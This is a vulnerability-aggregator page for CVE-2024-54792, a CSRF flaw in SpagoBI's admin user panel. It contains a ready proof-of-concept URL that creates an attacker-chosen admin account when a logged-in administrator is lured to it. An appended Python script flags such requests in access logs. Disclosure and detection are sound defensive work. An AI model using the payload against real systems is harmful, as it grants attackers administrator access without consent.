Related vulnerability
Title:
Engineering SpagoBI cross-site request forgery vulnerability
(CVE-2024-54792)
Description: Engineering SpagoBI is an open-source, J2EE-based business intelligence suite from the Italian company Engineering. The suite is mainly used to manage BI objects such as reports, scorecards and data-mining models, and the BI manager can control, check, validate and distribute these BI objects. Engineering SpagoBI 3.5.1 and earlier contain a security vulnerability: a cross-site request forgery flaw that lets an attacker induce other users to perform unwanted actions.
Description
SpagoBI csrf
Introduction
# CVE-2024-54792
**Severity:** **Medium** (**6.1**)
**CVSS score:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
## Summary
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.
## PoC
The add/edit/delete user panel, accessible to the admin user, does not contain CSRF countermeasures.
### Steps to Reproduce
1. Embed this URL, customized with **victim_host**, **custom_username** and **custom_password**, into an HTML page that makes the request, and trick a victim who is logged in with admin rights into visiting that page. A new user will be created in the platform.
```
https://<victim_host>/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=<custom_username>&fullName=<custom_username>&id=0&pwd=<custom_password>&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
```
## Affected Version Details
- <= 3.5.1
## Impact
Because the panel lacks CSRF countermeasures, the attacker can trick a victim logged in with admin rights into unknowingly issuing a GET request that inserts a user with attacker-chosen credentials into the platform. The attacker can then log in with those credentials.
## Mitigation
- Update to the latest version.
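An added example (not part of the advisory or of the SpagoBI project): it decodes the parameters of a MANAGE_USER_ACTION request such as the PoC URL above, and scans constructed access-log lines for GET user-insert requests whose Referer is missing or points outside the application's own host, one way to spot exploitation attempts while the upgrade is pending. The log format, host names and user names are assumptions.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit
# Endpoint and action name taken from the PoC URL in the advisory.
USER_MGMT_PATH = "/SpagoBI/servlet/AdapterHTTP"
USER_MGMT_ACTION = "MANAGE_USER_ACTION"
# Apache/Tomcat "combined" access-log format (assumed; adjust to your server).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'\d+ \S+ "(?P<referer>[^"]*)" "[^"]*"$')

def parse_user_request(url):
    """Decode a MANAGE_USER_ACTION URL into message type, user id and role names;
    None for any other request. parse_qs percent-decodes the JSON in userRoles."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    if parts.path != USER_MGMT_PATH or qs.get("ACTION_NAME") != [USER_MGMT_ACTION]:
        return None
    try:
        roles = json.loads(qs.get("userRoles", ["[]"])[0])
    except ValueError:
        roles = []
    return {"message": qs.get("MESSAGE_DET", [""])[0], "user": qs.get("userId", [""])[0],
            "roles": [r.get("name", "") for r in roles if isinstance(r, dict)]}

def flag_csrf_candidates(log_lines, trusted_hosts):
    """Return GET user-insert requests whose Referer is absent or not one of the app's
    own hosts. A missing Referer is treated as suspicious (noisy but safe)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        info = parse_user_request("https://placeholder" + m["target"])
        if info is None or info["message"] != "USER_INSERT":
            continue
        referer_host = urlsplit(m["referer"]).netloc if m["referer"] != "-" else ""
        if referer_host not in trusted_hosts:
            hits.append({"ip": m["ip"], "user": info["user"], "roles": info["roles"],
                         "referer": m["referer"]})
    return hits

# Constructed sample log lines: a same-origin admin action, a cross-site lure, an unrelated hit.
ROLES = "%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%7D%5D"
def _log(user, referer):
    return ('10.0.0.5 - admin [10/Oct/2024:13:55:36 +0000] "GET /SpagoBI/servlet/AdapterHTTP'
            '?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=%s&userRoles=%s'
            ' HTTP/1.1" 200 512 "%s" "Mozilla/5.0"' % (user, ROLES, referer))
SAMPLE_LOG = [_log("alice", "https://bi.example/SpagoBI/servlet/AdapterHTTP"),
              _log("mallory", "https://lure.example/page.html"),
              '10.0.0.9 - - [10/Oct/2024:14:05:00 +0000] "GET /SpagoBI/ HTTP/1.1" 200 8 "-" "-"']
```

Because the request is a GET, the new user's password also lands in the query string of the access log, so treat those logs as sensitive when reviewing them.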
## References
-
File snapshot
[4.0K] /data/pocs/c816e8797cded0824cb75cdb34b0cf5d6a314e11
└── [1.4K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be accessed, please send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; for long-term maintenance, please consider paying for the local POC. Thank you for your support.